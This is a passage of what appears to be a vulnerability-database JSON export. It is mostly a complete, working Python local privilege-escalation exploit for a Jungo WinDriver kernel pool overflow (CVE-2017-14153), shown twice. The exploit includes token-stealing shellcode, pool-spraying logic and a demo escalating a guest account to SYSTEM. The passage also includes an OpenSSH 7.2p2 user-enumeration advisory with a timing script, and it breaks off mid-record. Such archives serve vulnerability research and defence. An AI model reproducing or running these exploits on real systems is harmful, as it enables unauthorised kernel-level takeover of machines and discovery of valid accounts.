kernel32.Process32NextW \n \ndef signed_to_unsigned(signed): \n\"\"\" \nConvert signed to unsigned integer. \n\"\"\" \nunsigned, = struct.unpack (\"L\", struct.pack (\"l\", signed)) \nreturn unsigned \n \ndef get_type_info(handle): \n\"\"\" \nGet the handle type information to find our sprayed objects. \n\"\"\" \npublic_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() \nsize = DWORD(sizeof(public_object_type_information)) \nwhile True: \nresult = signed_to_unsigned( \nntdll.NtQueryObject( \nhandle, 2, byref(public_object_type_information), size, None)) \nif result == STATUS_SUCCESS: \nreturn public_object_type_information.Name.Buffer \nelif result == STATUS_INFO_LENGTH_MISMATCH: \nsize = DWORD(size.value * 4) \nresize(public_object_type_information, size.value) \nelif result == STATUS_INVALID_HANDLE: \nreturn None \nelse: \nraise x_file_handles(\"NtQueryObject.2\", hex (result)) \n \ndef get_handles(): \n\"\"\" \nReturn all the processes handles in the system at the time. \nCan be done from LI (Low Integrity) level on Windows 7 x86. 
\n\"\"\" \nsystem_handle_information = SYSTEM_HANDLE_INFORMATION_EX() \nsize = DWORD (sizeof (system_handle_information)) \nwhile True: \nresult = ntdll.NtQuerySystemInformation( \nSystemExtendedHandleInformation, \nbyref(system_handle_information), \nsize, \nbyref(size) \n) \nresult = signed_to_unsigned(result) \nif result == STATUS_SUCCESS: \nbreak \nelif result == STATUS_INFO_LENGTH_MISMATCH: \nsize = DWORD(size.value * 4) \nresize(system_handle_information, size.value) \nelse: \nraise x_file_handles(\"NtQuerySystemInformation\", hex(result)) \n \npHandles = cast( \nsystem_handle_information.Handles, \nPOINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \\ \nsystem_handle_information.NumberOfHandles) \n) \nfor handle in pHandles.contents: \nyield handle.UniqueProcessId, handle.HandleValue, handle.Object \n \ndef we_can_alloc_shellcode(): \n\"\"\" \nThis function allocates the shellcode @ the null page making \nsure the new OkayToCloseProcedure pointer points to shellcode. \n\"\"\" \nbaseadd = c_int(0x00000004) \nnull_size = c_int(0x1000) \n \ntokenstealing = ( \n\"\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x50\\x8B\\xC8\\x8B\\x80\" \n\"\\xB8\\x00\\x00\\x00\\x2D\\xB8\\x00\\x00\\x00\\x83\\xB8\\xB4\\x00\\x00\\x00\\x04\" \n\"\\x75\\xEC\\x8B\\x90\\xF8\\x00\\x00\\x00\\x89\\x91\\xF8\\x00\\x00\\x00\\xC2\\x10\" \n\"\\x00\" ) \n \nOkayToCloseProcedure = struct.pack(\"<L\", 0x00000078) \nsc = \"\\x42\" * 0x70 + OkayToCloseProcedure \n \n# first we restore our smashed TypeIndex \nsc += \"\\x83\\xC6\\x0c\" # add esi, 0c \nsc += \"\\xc7\\x06\\x0a\\x00\\x08\\x00\" # mov [esi], 8000a \nsc += \"\\x83\\xee\\x0c\" # sub esi, 0c \nsc += tokenstealing \nsc += \"\\x90\" * (0x400-len(sc)) \nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \nPOINTER(c_int), c_int, c_int] \ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \nbyref(null_size), \nMEM_RESERVE|MEM_COMMIT, \nPAGE_EXECUTE_READWRITE) \nif dwStatus != STATUS_SUCCESS: 
\nprint \"(-) error while allocating the null paged memory: %s\" % dwStatus \nreturn False \nwritten = c_ulong() \nwrite = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written)) \nif write == 0: \nprint \"(-) error while writing our junk to the null paged memory: %s\" % write \nreturn False \nreturn True \n \ndef we_can_spray(): \n\"\"\" \nSpray the Kernel Pool with IoCompletionReserve and Event Objects. \nThe IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length. \nThese are allocated from the Nonpaged kernel pool. \n\"\"\" \nhandles = [] \nIO_COMPLETION_OBJECT = 1 \nfor i in range(0, 25000): \nhandles.append(windll.kernel32.CreateEventA(0,0,0,0)) \nhHandle = HANDLE(0) \nhandles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT)) \n \n# could do with some better validation \nif len(handles) > 0: \nreturn True \nreturn False \n \ndef alloc_pool_overflow_buffer(base, input_size): \n\"\"\" \nCraft our special buffer to trigger the overflow. \n\"\"\" \nprint \"(+) allocating pool overflow input buffer\" \nbaseadd = c_int(base) \nsize = c_int(input_size) \ninput = \"\\x41\" * 0x18 # offset to size \ninput += struct.pack(\"<I\", 0x0000008d) # controlled size (this triggers the overflow) \ninput += \"\\x42\" * (0x90-len(input)) # padding to survive bsod \ninput += struct.pack(\"<I\", 0x00000000) # use a NULL dword for sub_4196CA \ninput += \"\\x43\" * ((0x460-0x8)-len(input)) # fill our pool buffer \n \n# repair the allocated chunk header... 
\ninput += struct.pack(\"<I\", 0x040c008c) # _POOL_HEADER \ninput += struct.pack(\"<I\", 0xef436f49) # _POOL_HEADER (PoolTag) \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (PointerCount) \ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (HandleCount) \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (Lock) \ninput += struct.pack(\"<I\", 0x00080000) # _OBJECT_HEADER (TypeIndex) \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo) \n \n# filler \ninput += \"\\x44\" * (input_size-len(input)) \nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \nPOINTER(c_int), c_int, c_int] \ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \nbyref(size), \nMEM_RESERVE|MEM_COMMIT, \nPAGE_EXECUTE_READWRITE) \nif dwStatus != STATUS_SUCCESS: \nprint \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff) \nreturn False \nwritten = c_ulong() \nwrite = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written)) \nif write == 0: \nprint \"(-) error while writing our input buffer memory: %s\" % write \nreturn False \nreturn True \n \ndef we_can_trigger_the_pool_overflow(): \n\"\"\" \nThis triggers the pool overflow vulnerability using a buffer of size 0x460. 
\n\"\"\" \nGENERIC_READ = 0x80000000 \nGENERIC_WRITE = 0x40000000 \nOPEN_EXISTING = 0x3 \nDEVICE_NAME = \"\\\\\\\\.\\\\WinDrvr1240\" \ndwReturn = c_ulong() \ndriver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) \ninputbuffer = 0x41414141 \ninputbuffer_size = 0x5000 \noutputbuffer_size = 0x5000 \noutputbuffer = 0x20000000 \nalloc_pool_overflow_buffer(inputbuffer, inputbuffer_size) \nIoStatusBlock = c_ulong() \n \nif driver_handle: \ndev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7, \ninputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size) \nreturn True \nreturn False \n \ndef we_can_make_pool_holes(): \n\"\"\" \nThis makes the pool holes that will coalesce into a hole of size 0x460. \n\"\"\" \nglobal khandlesd \nmypid = os.getpid() \nkhandlesd = {} \nkhandlesl = [] \n \n# leak kernel handles \nfor pid, handle, obj in get_handles(): \n \n# mixed object attack \nif pid == mypid and (get_type_info(handle) == \"Event\" or get_type_info(handle) == \"IoCompletionReserve\"): \nkhandlesd[obj] = handle \nkhandlesl.append(obj) \n \n# Find holes and make our allocation \nholes = [] \nfor obj in khandlesl: \n \n# obj address is the handle address, but we want to allocation \n# address, so we just remove the size of the object header from it. 
\nalloc = obj - 0x30 \n \n# Get allocations at beginning of the page \nif (alloc & 0xfffff000) == alloc: \nbin = [] \n \n# object sizes \nCreateEvent_size = 0x40 \nIoCompletionReserve_size = 0x60 \ncombined_size = CreateEvent_size + IoCompletionReserve_size \n \n# after the 0x20 chunk hole, the first object will be the IoCompletionReserve object \noffset = IoCompletionReserve_size \nfor i in range(offset, offset + (7 * combined_size), combined_size): \ntry: \n# chunks need to be next to each other for the coalesce to take effect \nbin.append(khandlesd[obj + i]) \nbin.append(khandlesd[obj + i - IoCompletionReserve_size]) \nexcept KeyError: \npass \n \n# make sure it's contiguously allocated memory \nif len(tuple(bin)) == 14: \nholes.append(tuple(bin)) \n \n# make the holes to fill \nfor hole in holes: \nfor handle in hole: \nkernel32.CloseHandle(handle) \nreturn True \n \ndef trigger_lpe(): \n\"\"\" \nThis function frees the IoCompletionReserve objects and this triggers the \nregistered aexit, which is our controlled pointer to OkayToCloseProcedure. 
\n\"\"\" \n# free the corrupted chunk to trigger OkayToCloseProcedure \nfor k, v in khandlesd.iteritems(): \nkernel32.CloseHandle(v) \nos.system(\"cmd.exe\") \n \ndef main(): \nprint \"\\n\\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\" \nprint \"\\t Steven Seeley (mr_me) of Source Incite\\r\\n\" \n \nif release() != \"7\" or architecture()[0] != \"32bit\": \nprint \"(-) although this exploit may work on this system,\" \nprint \" it was only designed for Windows 7 x86.\" \nsys.exit(-1) \n \nprint \"(+) spraying pool with mixed objects...\" \nif we_can_spray(): \nprint \"(+) sprayed the pool!\" \nprint \"(+) making pool holes...\" \nif we_can_make_pool_holes(): \nprint \"(+) made the pool holes!\" \nprint \"(+) allocating shellcode...\" \nif we_can_alloc_shellcode(): \nprint \"(+) allocated the shellcode!\" \nprint \"(+) triggering pool overflow...\" \nif we_can_trigger_the_pool_overflow(): \nprint \"(+) elevating privileges!\" \ntrigger_lpe() \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144046/jungowindriver-overflow.txt"}, {"lastseen": "2016-12-05T22:23:29", "bulletinFamily": "exploit", "description": "", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "href": "https://packetstormsecurity.com/files/137942/OpenSSHD-7.2p2-User-Enumeration.html", "id": "PACKETSTORM:137942", "type": "packetstorm", "title": "OpenSSHD 7.2p2 User Enumeration", "sourceData": "`-------------------------------------------------------------------- \nUser Enumeration using Open SSHD (<=Latest version). \n------------------------------------------------------------------- \n \nAbstract: \n----------- \nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash. 
\n \nCVE-ID \n--------- \nCVE-2016-6210 \n \nTested versions \n-------------------- \nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well). \n \nFix \n----------------- \nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet). \n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion). \n \nDetails \n---------------- \nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm. \nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \nresponse time from the server for non-existing users. \n \nSample code: \n---------------- \nimport paramiko \nimport time \nuser=raw_input(\"user: \") \np='A'*25000 \nssh = paramiko.SSHClient() \nstarttime=time.clock() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \ntry: \nssh.connect('127.0.0.1', username=user, \npassword=p) \nexcept: \nendtime=time.clock() \ntotal=endtime-starttime \nprint(total) \n \n(Valid users will result in higher total time). \n \n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user... \n \n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \npackets of the server, since this will eliminate any network delays on the way. \n \nEddie Harari \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/137942/openssh-enumerate.txt"}], "exploitdb": [{"lastseen": "2017-09-06T20:06:13", "bulletinFamily": "exploit", "description": "Jungo DriverWizard WinDriver - Kernel Pool Overflow. CVE-2017-14153. 
Local exploit for Windows platform", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "id": "EDB-ID:42624", "href": "https://www.exploit-db.com/exploits/42624/", "type": "exploitdb", "title": "Jungo DriverWizard WinDriver - Kernel Pool Overflow", "sourceData": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nJungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability\r\n\r\nDownload: http://www.jungo.com/st/products/windriver/\r\nFile: WD1240.EXE\r\nSha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba\r\nDriver: windrvr1240.sys\r\nSha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad\r\nCVE: CVE-2017-14153\r\nAuthor: Steven Seeley (mr_me) of Source Incite\r\nAffected: <= v12.4.0\r\nThanks: b33f, ryujin and sickness\r\nAnalysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html\r\n\r\nSummary:\r\n========\r\n\r\nThis vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. \r\n\r\nThe specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. 
An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.\r\n\r\nTimeline:\r\n=========\r\n\r\n2017-08-22 \u2013 Verified and sent to Jungo via sales@/first@/security@/info@jungo.com\r\n2017-08-25 \u2013 No response from Jungo and two bounced emails\r\n2017-08-26 \u2013 Attempted a follow up with the vendor via website chat\r\n2017-08-26 \u2013 No response via the website chat\r\n2017-09-03 \u2013 Recieved an email from a Jungo representative stating that they are \"looking into it\"\r\n2017-09-03 \u2013 Requested a timeframe for patch development and warned of possible 0day release\r\n2017-09-06 \u2013 No response from Jungo\r\n2017-09-06 \u2013 Public 0day release of advisory\r\n\r\nExample:\r\n========\r\n\r\nC:\\Users\\Guest\\Desktop>icacls poc.py\r\npoc.py NT AUTHORITY\\Authenticated Users:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Users:(I)(F)\r\n Mandatory Label\\Low Mandatory Level:(I)(NW)\r\n\r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\ndebugee\\guest\r\n\r\nC:\\Users\\Guest\\Desktop>poc.py\r\n\r\n --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\r\n Steven Seeley (mr_me) of Source Incite\r\n\r\n(+) spraying pool with mixed objects...\r\n(+) sprayed the pool!\r\n(+) making pool holes...\r\n(+) made the pool holes!\r\n(+) allocating shellcode...\r\n(+) allocated the shellcode!\r\n(+) triggering pool overflow...\r\n(+) allocating pool overflow input buffer\r\n(+) elevating privileges!\r\nMicrosoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation. 
All rights reserved.\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\nnt authority\\system\r\n\r\nC:\\Users\\Guest\\Desktop>\r\n\"\"\"\r\nfrom ctypes import *\r\nfrom ctypes.wintypes import *\r\nimport struct, sys, os, time\r\nfrom platform import release, architecture\r\n\r\nntdll = windll.ntdll\r\nkernel32 = windll.kernel32\r\nMEM_COMMIT = 0x00001000\r\nMEM_RESERVE = 0x00002000\r\nPAGE_EXECUTE_READWRITE = 0x00000040\r\nSTATUS_SUCCESS = 0x0\r\nSTATUS_INFO_LENGTH_MISMATCH = 0xC0000004\r\nSTATUS_INVALID_HANDLE = 0xC0000008\r\nSystemExtendedHandleInformation = 64\r\n\r\nclass LSA_UNICODE_STRING(Structure):\r\n \"\"\"Represent the LSA_UNICODE_STRING on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"Length\", USHORT),\r\n (\"MaximumLength\", USHORT),\r\n (\"Buffer\", LPWSTR),\r\n ]\r\n\r\nclass SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):\r\n \"\"\"Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"Object\", c_void_p),\r\n (\"UniqueProcessId\", ULONG),\r\n (\"HandleValue\", ULONG),\r\n (\"GrantedAccess\", ULONG),\r\n (\"CreatorBackTraceIndex\", USHORT),\r\n (\"ObjectTypeIndex\", USHORT),\r\n (\"HandleAttributes\", ULONG),\r\n (\"Reserved\", ULONG),\r\n ]\r\n \r\nclass SYSTEM_HANDLE_INFORMATION_EX(Structure):\r\n \"\"\"Represent the SYSTEM_HANDLE_INFORMATION on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"NumberOfHandles\", ULONG),\r\n (\"Reserved\", ULONG),\r\n (\"Handles\", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),\r\n ]\r\n\r\nclass PUBLIC_OBJECT_TYPE_INFORMATION(Structure):\r\n \"\"\"Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"Name\", LSA_UNICODE_STRING),\r\n (\"Reserved\", ULONG * 22),\r\n ]\r\n\r\nclass PROCESSENTRY32(Structure):\r\n _fields_ = [\r\n (\"dwSize\", c_ulong),\r\n (\"cntUsage\", c_ulong),\r\n (\"th32ProcessID\", c_ulong),\r\n (\"th32DefaultHeapID\", c_int),\r\n (\"th32ModuleID\", c_ulong),\r\n (\"cntThreads\", c_ulong),\r\n (\"th32ParentProcessID\", c_ulong),\r\n (\"pcPriClassBase\", c_long),\r\n 
(\"dwFlags\", c_ulong),\r\n (\"szExeFile\", c_wchar * MAX_PATH)\r\n ]\r\n\r\nProcess32First = kernel32.Process32FirstW\r\nProcess32Next = kernel32.Process32NextW\r\n\r\ndef signed_to_unsigned(signed):\r\n \"\"\"\r\n Convert signed to unsigned integer.\r\n \"\"\"\r\n unsigned, = struct.unpack (\"L\", struct.pack (\"l\", signed))\r\n return unsigned\r\n \r\ndef get_type_info(handle):\r\n \"\"\"\r\n Get the handle type information to find our sprayed objects.\r\n \"\"\"\r\n public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()\r\n size = DWORD(sizeof(public_object_type_information))\r\n while True:\r\n result = signed_to_unsigned(\r\n ntdll.NtQueryObject(\r\n handle, 2, byref(public_object_type_information), size, None))\r\n if result == STATUS_SUCCESS:\r\n return public_object_type_information.Name.Buffer\r\n elif result == STATUS_INFO_LENGTH_MISMATCH:\r\n size = DWORD(size.value * 4)\r\n resize(public_object_type_information, size.value)\r\n elif result == STATUS_INVALID_HANDLE:\r\n return None\r\n else:\r\n raise x_file_handles(\"NtQueryObject.2\", hex (result))\r\n\r\ndef get_handles():\r\n \"\"\"\r\n Return all the processes handles in the system at the time.\r\n Can be done from LI (Low Integrity) level on Windows 7 x86.\r\n \"\"\"\r\n system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()\r\n size = DWORD (sizeof (system_handle_information))\r\n while True:\r\n result = ntdll.NtQuerySystemInformation(\r\n SystemExtendedHandleInformation,\r\n byref(system_handle_information),\r\n size,\r\n byref(size)\r\n )\r\n result = signed_to_unsigned(result)\r\n if result == STATUS_SUCCESS:\r\n break\r\n elif result == STATUS_INFO_LENGTH_MISMATCH:\r\n size = DWORD(size.value * 4)\r\n resize(system_handle_information, size.value)\r\n else:\r\n raise x_file_handles(\"NtQuerySystemInformation\", hex(result))\r\n\r\n pHandles = cast(\r\n system_handle_information.Handles,\r\n POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \\\r\n 
system_handle_information.NumberOfHandles)\r\n )\r\n for handle in pHandles.contents:\r\n yield handle.UniqueProcessId, handle.HandleValue, handle.Object\r\n\r\ndef we_can_alloc_shellcode():\r\n \"\"\" \r\n This function allocates the shellcode @ the null page making\r\n sure the new OkayToCloseProcedure pointer points to shellcode.\r\n \"\"\"\r\n baseadd = c_int(0x00000004)\r\n null_size = c_int(0x1000)\r\n\r\n tokenstealing = (\r\n \"\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x50\\x8B\\xC8\\x8B\\x80\"\r\n \"\\xB8\\x00\\x00\\x00\\x2D\\xB8\\x00\\x00\\x00\\x83\\xB8\\xB4\\x00\\x00\\x00\\x04\"\r\n \"\\x75\\xEC\\x8B\\x90\\xF8\\x00\\x00\\x00\\x89\\x91\\xF8\\x00\\x00\\x00\\xC2\\x10\"\r\n \"\\x00\" )\r\n \r\n OkayToCloseProcedure = struct.pack(\"<L\", 0x00000078)\r\n sc = \"\\x42\" * 0x70 + OkayToCloseProcedure\r\n\r\n # first we restore our smashed TypeIndex\r\n sc += \"\\x83\\xC6\\x0c\" # add esi, 0c\r\n sc += \"\\xc7\\x06\\x0a\\x00\\x08\\x00\" # mov [esi], 8000a\r\n sc += \"\\x83\\xee\\x0c\" # sub esi, 0c \r\n sc += tokenstealing\r\n sc += \"\\x90\" * (0x400-len(sc))\r\n ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \r\n POINTER(c_int), c_int, c_int]\r\n dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \r\n byref(null_size), \r\n MEM_RESERVE|MEM_COMMIT,\r\n PAGE_EXECUTE_READWRITE)\r\n if dwStatus != STATUS_SUCCESS:\r\n print \"(-) error while allocating the null paged memory: %s\" % dwStatus\r\n return False\r\n written = c_ulong()\r\n write = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written))\r\n if write == 0:\r\n print \"(-) error while writing our junk to the null paged memory: %s\" % write\r\n return False\r\n return True\r\n\r\ndef we_can_spray():\r\n \"\"\"\r\n Spray the Kernel Pool with IoCompletionReserve and Event Objects. 
\r\n The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.\r\n These are allocated from the Nonpaged kernel pool.\r\n \"\"\"\r\n handles = []\r\n IO_COMPLETION_OBJECT = 1\r\n for i in range(0, 25000):\r\n handles.append(windll.kernel32.CreateEventA(0,0,0,0))\r\n hHandle = HANDLE(0)\r\n handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))\r\n\r\n # could do with some better validation\r\n if len(handles) > 0:\r\n return True\r\n return False\r\n\r\ndef alloc_pool_overflow_buffer(base, input_size):\r\n \"\"\"\r\n Craft our special buffer to trigger the overflow.\r\n \"\"\"\r\n print \"(+) allocating pool overflow input buffer\"\r\n baseadd = c_int(base)\r\n size = c_int(input_size)\r\n input = \"\\x41\" * 0x18 # offset to size\r\n input += struct.pack(\"<I\", 0x0000008d) # controlled size (this triggers the overflow)\r\n input += \"\\x42\" * (0x90-len(input)) # padding to survive bsod\r\n input += struct.pack(\"<I\", 0x00000000) # use a NULL dword for sub_4196CA\r\n input += \"\\x43\" * ((0x460-0x8)-len(input)) # fill our pool buffer\r\n \r\n # repair the allocated chunk header...\r\n input += struct.pack(\"<I\", 0x040c008c) # _POOL_HEADER\r\n input += struct.pack(\"<I\", 0xef436f49) # _POOL_HEADER (PoolTag)\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (PointerCount)\r\n input += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (HandleCount)\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (Lock)\r\n input += struct.pack(\"<I\", 0x00080000) # _OBJECT_HEADER (TypeIndex)\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)\r\n \r\n # filler\r\n input += \"\\x44\" 
* (input_size-len(input))\r\n ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \r\n POINTER(c_int), c_int, c_int]\r\n dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \r\n byref(size), \r\n MEM_RESERVE|MEM_COMMIT,\r\n PAGE_EXECUTE_READWRITE)\r\n if dwStatus != STATUS_SUCCESS:\r\n print \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff)\r\n return False\r\n written = c_ulong()\r\n write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))\r\n if write == 0:\r\n print \"(-) error while writing our input buffer memory: %s\" % write\r\n return False\r\n return True\r\n\r\ndef we_can_trigger_the_pool_overflow():\r\n \"\"\"\r\n This triggers the pool overflow vulnerability using a buffer of size 0x460.\r\n \"\"\"\r\n GENERIC_READ = 0x80000000\r\n GENERIC_WRITE = 0x40000000\r\n OPEN_EXISTING = 0x3\r\n DEVICE_NAME = \"\\\\\\\\.\\\\WinDrvr1240\"\r\n dwReturn = c_ulong()\r\n driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)\r\n inputbuffer = 0x41414141\r\n inputbuffer_size = 0x5000\r\n outputbuffer_size = 0x5000\r\n outputbuffer = 0x20000000\r\n alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)\r\n IoStatusBlock = c_ulong()\r\n\r\n if driver_handle:\r\n dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,\r\n inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)\r\n return True\r\n return False\r\n\r\ndef we_can_make_pool_holes():\r\n \"\"\"\r\n This makes the pool holes that will coalesce into a hole of size 0x460.\r\n \"\"\"\r\n global khandlesd\r\n mypid = os.getpid()\r\n khandlesd = {}\r\n khandlesl = []\r\n \r\n # leak kernel handles\r\n for pid, handle, obj in get_handles():\r\n\r\n # mixed object attack\r\n if pid == mypid and (get_type_info(handle) == \"Event\" or get_type_info(handle) == \"IoCompletionReserve\"):\r\n khandlesd[obj] = 
handle\r\n khandlesl.append(obj)\r\n\r\n # Find holes and make our allocation\r\n holes = []\r\n for obj in khandlesl:\r\n\r\n # obj address is the handle address, but we want to allocation\r\n # address, so we just remove the size of the object header from it.\r\n alloc = obj - 0x30\r\n\r\n # Get allocations at beginning of the page\r\n if (alloc & 0xfffff000) == alloc:\r\n bin = []\r\n\r\n # object sizes\r\n CreateEvent_size = 0x40\r\n IoCompletionReserve_size = 0x60\r\n combined_size = CreateEvent_size + IoCompletionReserve_size\r\n\r\n # after the 0x20 chunk hole, the first object will be the IoCompletionReserve object\r\n offset = IoCompletionReserve_size \r\n for i in range(offset, offset + (7 * combined_size), combined_size):\r\n try:\r\n # chunks need to be next to each other for the coalesce to take effect\r\n bin.append(khandlesd[obj + i])\r\n bin.append(khandlesd[obj + i - IoCompletionReserve_size])\r\n except KeyError:\r\n pass\r\n\r\n # make sure it's contiguously allocated memory\r\n if len(tuple(bin)) == 14:\r\n holes.append(tuple(bin))\r\n\r\n # make the holes to fill\r\n for hole in holes:\r\n for handle in hole:\r\n kernel32.CloseHandle(handle)\r\n return True\r\n\r\ndef trigger_lpe():\r\n \"\"\"\r\n This function frees the IoCompletionReserve objects and this triggers the \r\n registered aexit, which is our controlled pointer to OkayToCloseProcedure.\r\n \"\"\"\r\n # free the corrupted chunk to trigger OkayToCloseProcedure\r\n for k, v in khandlesd.iteritems():\r\n kernel32.CloseHandle(v)\r\n os.system(\"cmd.exe\")\r\n\r\ndef main():\r\n print \"\\n\\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\"\r\n print \"\\t Steven Seeley (mr_me) of Source Incite\\r\\n\"\r\n\r\n if release() != \"7\" or architecture()[0] != \"32bit\":\r\n print \"(-) although this exploit may work on this system,\"\r\n print \" it was only designed for Windows 7 x86.\"\r\n sys.exit(-1)\r\n\r\n print \"(+) spraying pool with mixed objects...\"\r\n if 
we_can_spray():\r\n print \"(+) sprayed the pool!\"\r\n print \"(+) making pool holes...\"\r\n if we_can_make_pool_holes():\r\n print \"(+) made the pool holes!\"\r\n print \"(+) allocating shellcode...\"\r\n if we_can_alloc_shellcode():\r\n print \"(+) allocated the shellcode!\"\r\n print \"(+) triggering pool overflow...\"\r\n if we_can_trigger_the_pool_overflow():\r\n print \"(+) elevating privileges!\"\r\n trigger_lpe()\r\n\r\nif __name__ == '__main__':\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42624/"}, {"lastseen": "2016-07-18T13:28:25", "bulletinFamily": "exploit", "description": "OpenSSHD <= 7.2p2 - User Enumeration. CVE-2016-6210. Remote exploit for Linux platform", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "id": "EDB-ID:40113", "href": "https://www.exploit-db.com/exploits/40113/", "type": "exploitdb", "title": "OpenSSHD <= 7.2p2 - User Enumeration", "sourceData": "Source: 